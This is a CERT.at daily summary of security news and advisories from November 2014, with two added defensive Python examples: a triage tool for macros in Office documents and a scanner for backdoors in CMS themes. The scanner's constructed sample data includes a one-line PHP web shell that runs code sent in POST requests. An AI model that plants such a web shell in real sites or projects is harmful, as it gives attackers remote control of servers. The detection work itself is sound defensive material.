[CERT-daily] Daily summary - Thursday 20-11-2014

Daily end-of-shift report team at cert.at
Thu Nov 20 18:14:12 CET 2014


=======================
= End-of-Shift report =
=======================

Timeframe:   Wednesday 19-11-2014 18:00 − Thursday 20-11-2014 18:00
Handler:     Stephan Richter
Co-Handler:  n/a




*** ROVNIX Infects Systems with Password-Protected Macros ***
---------------------------------------------
We recently found that the malware family ROVNIX is capable of being distributed via a macro downloader. This malware technique was previously seen in the DRIDEX malware, which was notable for using the same routines. DRIDEX is also known as the successor of the banking malware CRIDEX. Though a fairly old method for infection, cybercriminals realized that using malicious macros work...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/0rtiBt3T3E4/
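Because a VBA project password only locks the editor view, the presence of a macro project is still visible in the document container itself. The following added example (written for this digest, not code from Trend Micro or from the ROVNIX write-up) triages an Office Open XML file by inspecting its zip package for a vbaProject.bin part and macro-enabled content types; the sample .docx/.docm files are constructed in memory, and legacy OLE2 .doc/.xls files are out of scope.

```python
"""Triage an Office Open XML document for an embedded VBA macro project.

Added example, not tooling from the ROVNIX/DRIDEX write-up. The checks are
purely structural (zip package layout and declared content types), so a
VBA project password changes nothing about the result.
"""
import io
import zipfile

# A vbaProject.bin part is itself an OLE2 compound file; this is its magic.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_MAIN_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_TYPE = (
    "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
)

CONTENT_TYPES_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    "{extra_default}"
    '<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
    "</Types>"
)


def build_sample(with_macro: bool) -> bytes:
    """Construct a minimal .docx (with_macro=False) or .docm in memory.

    This is constructed test data, not a document seen in the wild.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if with_macro:
            main_type = MACRO_MAIN_TYPE
            extra = f'<Default Extension="bin" ContentType="{VBA_CONTENT_TYPE}"/>'
        else:
            main_type = PLAIN_MAIN_TYPE
            extra = ""
        zf.writestr(
            "[Content_Types].xml",
            CONTENT_TYPES_TEMPLATE.format(extra_default=extra, main_type=main_type),
        )
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Stub VBA project: a real one is an OLE2 container holding the module
            # streams; the "password" is just a project property inside it.
            zf.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 504)
    return buf.getvalue()


def triage_ooxml(data: bytes) -> dict:
    """Return macro indicators derived from the package structure alone."""
    result = {
        "is_zip": False,
        "vba_parts": [],
        "macro_enabled_content_type": False,
        "vba_content_type_declared": False,
        "has_macros": False,
    }
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        try:
            ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        except KeyError:
            ctypes = ""
        result["vba_content_type_declared"] = VBA_CONTENT_TYPE in ctypes
        result["macro_enabled_content_type"] = "macroEnabled" in ctypes
        for name in zf.namelist():
            # Match the part by name regardless of the directory (word/, xl/, ppt/).
            if name.lower().endswith("vbaproject.bin"):
                part = zf.read(name)
                result["vba_parts"].append(
                    {"name": name, "ole2": part.startswith(OLE2_MAGIC), "size": len(part)}
                )
    result["has_macros"] = bool(result["vba_parts"]) or result["vba_content_type_declared"]
    return result


if __name__ == "__main__":
    for label, sample in (("clean.docx", build_sample(False)), ("macro.docm", build_sample(True))):
        print(label, triage_ooxml(sample))
```

The two indicators are deliberately checked separately: a vbaProject.bin part that is not declared in [Content_Types].xml, or a declared content type without the part, is itself worth a closer look. For pulling out and deobfuscating the macro source, oletools' olevba handles both the OOXML and the OLE2 formats and is not stopped by the VBA project password.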




*** Citadel Variant Targets Password Managers ***
---------------------------------------------
Some Citadel-infected computers have received a new configuration file, a keylogger triggered to go after the master passwords from three leading password management tools.
---------------------------------------------
http://threatpost.com/citadel-variant-targets-password-managers/109493




*** CryptoPHP: Analysis of a hidden threat inside popular content management systems ***
---------------------------------------------
CryptoPHP is a threat that uses backdoored Joomla, WordPress and Drupal themes and plug-ins to compromise webservers on a large scale. By publishing pirated themes and plug-ins free for anyone to use instead of having to pay for them, the CryptoPHP actor is social engineering site administrators into installing the included backdoor on their server.
---------------------------------------------
http://blog.fox-it.com/2014/11/18/cryptophp-analysis-of-a-hidden-threat-inside-popular-content-management-systems/
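One check a site administrator can run before installing a theme or plug-in from an untrusted source, as an added example that is not Fox-IT's tooling and does not use indicators from the CryptoPHP report: walk the package and flag (1) include/require statements that point at files without a PHP extension and (2) files named like images or text that contain a PHP open tag. The sample tree is constructed and its file names are hypothetical.

```python
"""Scan a CMS theme or plug-in tree for PHP code hidden in non-code files.

Added example, not code from the Fox-IT report. Two generic heuristics:
  1. include/require whose target lacks a PHP extension (code pulled in
     from an "asset"), and
  2. image/text-named files that carry a PHP open tag, with or without a
     genuine image header in front of it (polyglot).
"""
import os
import re
from typing import Dict, List

PHP_EXTENSIONS = {".php", ".phtml", ".inc", ".php5", ".php7"}
NON_CODE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".ico", ".txt", ".css", ".js"}
# Magic bytes of image formats expected in a theme's asset directory.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")

INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*"                    # include/require/*_once
    r"(?:dirname\s*\(\s*__FILE__\s*\)\s*\.\s*|__DIR__\s*\.\s*)?"   # optional path prefix
    r"['\"]([^'\"]+)['\"]",                                         # quoted target
    re.IGNORECASE,
)


def suspicious_includes(php_source: str) -> List[str]:
    """Targets of include/require whose extension is not a PHP extension."""
    hits = []
    for target in INCLUDE_RE.findall(php_source):
        ext = os.path.splitext(target)[1].lower()
        if ext not in PHP_EXTENSIONS:
            hits.append(target)
    return hits


def scan_tree(files: Dict[str, bytes]) -> List[dict]:
    """files maps a relative path to its bytes (see load_tree() for a directory)."""
    findings = []
    for path, content in sorted(files.items()):
        ext = os.path.splitext(path)[1].lower()
        if ext in PHP_EXTENSIONS:
            for target in suspicious_includes(content.decode("utf-8", "replace")):
                findings.append({"file": path, "type": "include-of-non-php", "detail": target})
        elif ext in NON_CODE_EXTENSIONS and b"<?php" in content:
            # A valid image header followed by PHP is a polyglot; plain PHP under
            # an image name is the simpler case. Both are findings.
            kind = "polyglot-image-with-php" if content.startswith(IMAGE_MAGIC) else "php-in-non-code-file"
            findings.append({"file": path, "type": kind, "detail": ""})
    return findings


def load_tree(root: str) -> Dict[str, bytes]:
    """Read an on-disk theme/plug-in directory into the mapping scan_tree() expects."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return files


# Constructed sample tree (hypothetical names): functions.php pulls in an
# "image" that is really a PHP backdoor; logo.png is a genuine PNG stub.
SAMPLE_TREE = {
    "theme/functions.php": (
        b"<?php\n"
        b"require_once dirname(__FILE__) . '/inc/helpers.php';\n"
        b"include('assets/images/icons.png');\n"
    ),
    "theme/inc/helpers.php": b"<?php function theme_setup() {}\n",
    "theme/assets/images/icons.png": b"<?php eval(base64_decode($_POST['c'])); ?>",
    "theme/assets/images/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

if __name__ == "__main__":
    for finding in scan_tree(SAMPLE_TREE):
        print(finding)
```

Run it against a real package with `scan_tree(load_tree("/path/to/theme"))`. The include check is the stronger of the two signals: a backdoor that is only planted as a file needs something to execute it, and in a theme that is almost always an include from a file the CMS already loads, so every include target outside the PHP extensions deserves to be opened and read.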




*** An inside look: gathering and analyzing the SIR data ***
---------------------------------------------
At the Microsoft Malware Protection Center, threat data is a critical source of information to help protect our customers. We use it to understand what's going on in the overall malware ecosystem, determine the best way to protect our customers, and find the most effective way to deliver that protection. We also use the data to produce a number of reports to help our customers. This includes our bi-annual Security Intelligence Report (SIR). This blog post gives you a behind-the-scenes...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/11/19/an-inside-look-gathering-and-analyzing-the-sir-data.aspx




*** Annual Privacy Forum 2014 materials and APF2015 - Call for partnership ***
---------------------------------------------
ENISA's Information Security and Data Protection Unit announces the commencement of preparations for the Annual Privacy Forum of 2015.
---------------------------------------------
http://www.enisa.europa.eu/media/news-items/annual-privacy-forum-2014-materials-and-apf2015-call-for-partnership




*** Electronic Arts: Data leak at Origin ***
---------------------------------------------
Origin, Electronic Arts' online portal, is currently showing personal data of other users when the forums are accessed.
---------------------------------------------
http://www.golem.de/news/electronic-arts-datenpanne-bei-origin-1411-110689-rss.html




*** How Splitting A Computer Into Multiple Realities Can Protect You From Hackers ***
---------------------------------------------
Eight years ago, Polish hacker Joanna Rutkowska was experimenting with rootkits - tough-to-detect spyware that infects the deepest level of a computer's operating system - when she came up with a devious notion: What if, instead of putting spyware inside a victim's computer, you put the victim's computer inside the spyware? At the time, a technology known...
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/40ab9794/sc/4/l/0L0Swired0N0C20A140C110Cprotection0Efrom0Ehackers0C/story01.htm




*** Vulnerabilities identified in three Advantech products ***
---------------------------------------------
Researchers with Core Security have identified vulnerabilities in three products manufactured by Advantech, some of which can be exploited remotely.
---------------------------------------------
http://www.scmagazine.com/vulnerabilities-identified-in-three-advantech-products/article/384265/


*** Bugtraq: [CORE-2014-0009] - Advantech EKI-6340 Command Injection ***
---------------------------------------------
http://www.securityfocus.com/archive/1/534021


*** Bugtraq: [CORE-2014-0008] - Advantech AdamView Buffer Overflow ***
---------------------------------------------
http://www.securityfocus.com/archive/1/534022


*** Bugtraq: [CORE-2014-0010] - Advantech WebAccess Stack-based Buffer Overflow ***
---------------------------------------------
http://www.securityfocus.com/archive/1/534023




*** Drupal Patches Denial of Service Vulnerability; Details Disclosed ***
---------------------------------------------
Drupal has released a patch for a denial of service and account hijacking vulnerability, details of which were disclosed by the researchers who discovered the issue.
---------------------------------------------
http://threatpost.com/drupal-patches-denial-of-service-vulnerability-details-disclosed/109502


*** Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006 ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CORE-2014-006
Project: Drupal core
Version: 6.x, 7.x
Date: 2014-November-19
Security risk: 14/25 (Moderately Critical) AC:Basic/A:None/CI:Some/II:Some/E:Theoretical/TD:Uncommon
Vulnerability: Multiple vulnerabilities

Description

Session hijacking (Drupal 6 and 7)

A specially crafted request can give a user access to another user's session, allowing an attacker to hijack a random session. This attack is known to be possible on certain Drupal 7 sites which serve both HTTP and HTTPS...
---------------------------------------------
https://www.drupal.org/SA-CORE-2014-006




*** DRUPAL Security Advisories for Third-Party Modules ***
---------------------------------------------
https://www.drupal.org/node/2378287
https://www.drupal.org/node/2378279
https://www.drupal.org/node/2378441
https://www.drupal.org/node/2378401
https://www.drupal.org/node/2378367




*** R7-2014-18: Hikvision DVR Devices - Multiple Vulnerabilities ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities




*** Paid Memberships Pro plugin for WordPress getfile.php directory traversal ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/98805




*** Lsyncd default-rsyncssh.lua command execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/98806




*** Security Advisory-App Validity Check Bypass Vulnerability in Huawei P7 Smartphone ***
---------------------------------------------
Nov 20, 2014 14:53
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-397472.htm




*** Vuln: MantisBT core/file_api.php Security Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/71104




*** Xen Security Advisory 113 - Guest effectable page reference leak in MMU_MACHPHYS_UPDATE handling ***
---------------------------------------------
An error handling path in the processing of MMU_MACHPHYS_UPDATE failed to drop a page reference which was acquired in an earlier processing step.
---------------------------------------------
http://lists.xen.org/archives/html/xen-announce/2014-11/msg00003.html




*** IBM Security Network Protection Shell Command Injection ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/98519




*** IBM Security Bulletins related to POODLE ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_ibm_infosphere_master_data_management_cve_2014_3566?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_ibm_connections_cve_2014_3566?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_host_on_demand_cve_2014_3566?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_ibm_business_monitor_cve_2014_3566?lang=en_us




*** Other IBM Security Bulletins ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_fix_available_for_security_vulnerabilities_in_ckeditor_that_affect_ibm_inotes_9_0_1_x_cve_2014_5191?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerabilities_in_openssl_affect_ibm_infosphere_master_data_management_cve_2014_3513_cve_2014_3567?lang=en_us

